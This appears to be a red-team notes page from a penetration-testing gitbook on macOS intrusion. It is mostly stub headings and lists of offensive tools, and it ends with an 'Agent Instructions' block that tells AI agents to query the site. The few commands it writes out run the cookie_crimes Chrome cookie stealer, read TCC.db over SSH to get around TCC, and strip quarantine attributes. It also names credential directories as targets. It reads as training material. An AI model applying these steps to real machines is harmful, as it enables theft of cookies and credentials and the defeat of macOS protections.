# 13 - MacOS intrusion
* [MacOS Intrusion](#macos-intrusion)
* [MacOS 101](#macos-101)
* [Initial Access](#initial-access)
* [Installer Package](#installer-package)
* [App Bundles/Package](#app-bundlespackage)
* [AppleScript URL](#applescript-url)
* [2FA Phishing](#2fa-phishing)
* [MacOS payload generator](#macos-payload-generator)
* [Phishing using office](#phishing-using-office)
* [C2](#c2)
* [User Persistence](#user-persistence)
* [Plist - (LaunchAgents)](#plist---launchagents)
* [Login items](#login-items)
* [Login/Logout Hooks](#loginlogout-hooks)
* [CronJobs](#cronjobs)
* [Folder action scripts](#folder-action-scripts)
* [JXA persistence](#jxa-persistence)
* [Swift persistence scripts](#swift-persistence-scripts)
* [Authorization Plugins](#authorization-plugins)
* [Dock shortcut modification](#dock-shortcut-modification)
* [Atom Init script](#atom-init-script)
* [SSHrc persistence](#sshrc-persistence)
* [Vim plugin](#vim-plugin)
* [Sublim text app script](#sublim-text-app-script)
* [ZSH profile](#zsh-profile)
* [XBar Plugin](#xbar-plugin)
* [Root Persistence](#root-persistence)
* [Launch Daemons](#launch-daemons)
* [Emond](#emond)
* [Dylib persistence](#dylib-persistence)
* [Privilege Escalation](#privilege-escalation)
* [System creds](#system-creds)
* [Terminal history](#terminal-history)
* [Chrome "Cookie Crimes"](#chrome-cookie-crimes)
* [Helper tool](#helper-tool)
* [Prompt phishing](#prompt-phishing)
* [Lateral movement](#lateral-movement)
* [MacHound](#machound)
* [BiFrost](#bifrost)
* [SwiftBelt](#swiftbelt)
* [Living Of the Orchard Bins](#living-of-the-orchard-bins)
* [Credential Access](#credential-access)
* [Keychain](#keychain)
* [Phishing using prompt](#phishing-using-prompt)
* [Exfiltration](#exfiltration)
* [Exfiltrate Google Services](#exfiltrate-google-services)
* [Exfiltrating Jira](#exfiltrating-jira)
* [Slack exfiltration](#slack-exfiltration)
* [Impact](#impact)
* [MacOS Security Features](#macos-security-features)
* [Code Signing](#code-signing)
* [Entitlements](#entitlements)
* [System Integrity Protection (SIP)](#system-integrity-protection-sip)
* [TCC](#tcc)
* [Quarantine](#quarantine)
* [GateKeeper](#gatekeeper)
* [XProtect](#xprotect)
* [Extended Attributes](#extended-attributes)
* [Application sandbox](#application-sandbox)
* [Notarization](#notarization)
* [Apple Endpoint Security Framework](#apple-endpoint-security-framework)
* [Offensive MacOS - Training / Cert](#offensive-macos---training--cert)
* [HITB - Exploiting Directory PErmissions on MacOS](#hitb---exploiting-directory-permissions-on-macos)
* [Objective-See](#objective-see)
* [Offensive MacOs Repo](#offensive-macos-repo)
* [DEF CON 29 - Cedric Owens - Gone Apple Pickin: Red Teaming MacOS Environments in 2021](#def-con-29---cedric-owens---gone-apple-pickin-red-teaming-macos-environments-in-2021)
* [CVE-2021-30657 - Patrick Wardle Explanation (Objective-See)](#cve-2021-30657---patrick-wardle-explanation-objective-see)
* [Awesome MacOS Red Teaming](#awesome-macos-red-teaming)
* [Mac Security Conference](#mac-security-conference)
## MacOS Intrusion
[Mitre MacOS Matrix](https://attack.mitre.org/matrices/enterprise/macos/)
#### MacOS 101
| Windows | MacOS |
| -------------------------- | :--------------------------------------: |
| Registry | Property List Files (.plist) |
| Windows Event Logs | Apple Unified Logging |
| CMD / PSH | Terminal.app (bash / zsh)t |
| Portable Executable (PE) | Mach-O Executable |
| DLL | Dynamic Library (Dylib) |
| %APPDATA% | \~/Library/Application Support/ |
| SYSTEM / Administrators | Root / admin |
| LSASS | Keychain |
| User Account Control (UAC) | Transparency, Consent, and Control (TCC) |
| Privileges | Entitlements |
| .lnk | Dock Shortcuts |
| - | Application Bundles (.app) |
#### Initial Access
**Installer Package**
**App Bundles/Package**
**AppleScript URL**
*
**2FA Phishing**
EvilNginx
**MacOS payload generator**
*
**Phishing using office**
Payload execution will probably be sandboxed.
*
*
**C2**
*
*
*
#### User Persistence
\--> Main blog for persistence techniques: -
**Plist - (LaunchAgents)**
**Login items**
**Login/Logout Hooks**
**CronJobs**
**Folder action scripts**
**JXA persistence**
*
**Swift persistence scripts**
*
**Authorization Plugins**
**Dock shortcut modification**
**Atom Init script**
**SSHrc persistence**
**Vim plugin**
*
**Sublim text app script**
*
**ZSH profile**
**XBar Plugin**
*
#### Root Persistence
**Launch Daemons**
**Emond**
**Dylib persistence**
#### Privilege Escalation
*
Check if current user is local admin
```
id
dscl . list groups
dscl . read groups/admin
```
**System creds**
* aws
* gcp
* azure
* SSH keys
**Terminal history**
Look for ZSH, Bash and other terminal history.
**Chrome "Cookie Crimes"**
*
*
```
git clone https://github.com/defaultnamehere/cookie_crimes.git
cd cookie_crimes/
./cookie_crimes_macos.sh
```
**Helper tool**
*
**Prompt phishing**
Prompt user for credentials based on predefined context.
#### Lateral movement
**MacHound**
*
**BiFrost**
*
**SwiftBelt**
*
**Living Of the Orchard Bins**
*
#### Credential Access
**Keychain**
If root access you can retrieve and grab the **keychain** db and take offline using chainbreaker.
*
**Phishing using prompt**
#### Exfiltration
**Exfiltrate Google Services**
* [gd-thief](https://github.com/antman1p/GD-Thief)
* [gdir-thief](https://github.com/antman1p/GD-Thief)
* [conf-thief](https://github.com/antman1p/Conf-Thief)
**Exfiltrating Jira**
* [jir-thief](https://github.com/antman1p/Jir-Thief)
**Slack exfiltration**
* [slackhound](https://github.com/BojackThePillager/Slackhound)
* [slackpirate](https://github.com/emtunc/SlackPirate)
**Impact**
#### MacOS Security Features
**Code Signing**
* Introduced MacOS X Lion (10.7)
* Cryptographic signature embedded in app using (developer) certificate
* Verification handled by : **com.apple.driver.AppleMobileFileIntegrity.kext** kernel extension and **/usr/libexec/amfid** daemon
**Entitlements**
Granular set of permissions that allow or deny an application access to specific system resources or privileges. (Fine-grained rights)
Displaying entitlements for a binary or application
```
codesign –dv --entitlement - ./binary
```
We conducting red team operation, operator should look for processes with desired entitlements, **child process inherits the entitlements of the parent** by default.
**System Integrity Protection (SIP)**
**TCC**
TCC - Transaprency, Consent and Control is a mechanis in MacOS to limit and control application access to certain features. Requires user consent to access user data and some system resources.
\--> Similar to Window's UAC (User Account Control), prompting the user if needed permissions.
*
Folders such as **\~** and **/tmp** are not protected by TCC and followings sensitive directories such as:
* \~.ssh
* \~.aws
* \~.config
* gcloud
* credentials.db
* \~.azure
\--> If SSH is running you can SSH in locally to get full disk access and bypass TCC.
```
ssh user@ip "cat ~/Library/Application\ Support/com.apple.TCC/TCC.db"
```
*
*
**Quarantine**
Quarantine Attribute - q attr.
* Appended by the OS to files downloaded via browsers (similar to smart screen in Windows world)
\--> Using **curl** does not append the quarantine attribute to the file.
*
*
**GateKeeper**
**XProtect**
**Extended Attributes**
Listing extended attributes for a file
```
$ xattr downloadedFile
com.apple.metadata:kMDItemWhereFroms
com.apple.quarantine
```
Deleting quarantine attributes for a file
```
$ xattr -d com.apple.quarantine downloadedFile
$ xattr downloadedFile
com.apple.metadata:kMDItemWhereFroms
```
Deleting recursively
```
$ xattr -r -d com.apple.quarantine /path/to/MyApp.app
```
**Application sandbox**
**Notarization**
**Apple Endpoint Security Framework**
#### Offensive MacOS - Training / Cert
* [Specterops - Mac Tradfecraft](https://specterops.io/training/mac-tradecraft/)
* [EXP-312: Advanced macOS Control Bypasses](https://www.offsec.com/courses/exp-312/)
a### MacOS - Resources
*
*
*
**HITB - Exploiting Directory PErmissions on MacOS**
*
**Objective-See**
*
**Offensive MacOs Repo**
*
**DEF CON 29 - Cedric Owens - Gone Apple Pickin: Red Teaming MacOS Environments in 2021**
*
**CVE-2021-30657 - Patrick Wardle Explanation (Objective-See)**
Explanation of some MacOS security feature - Quarantine / GateKeeper / Notarization
*
**Awesome MacOS Red Teaming**
*
**Mac Security Conference**
*
**TO DO**
* Apple Events
* Read all :
*
*
* Office Macros: Application sandbox and escape
* JXA JavaScript For Automation
*
*
*
*
*
*
*
* Abuse daemons for privileges escalation ()
*
* Basically all cedowens repo User\_Launchdaemons() System\_Launchdaemons()
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://dr-anhkwar.gitbook.io/internal-network-penetration-testing/13-macos-intrusion.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.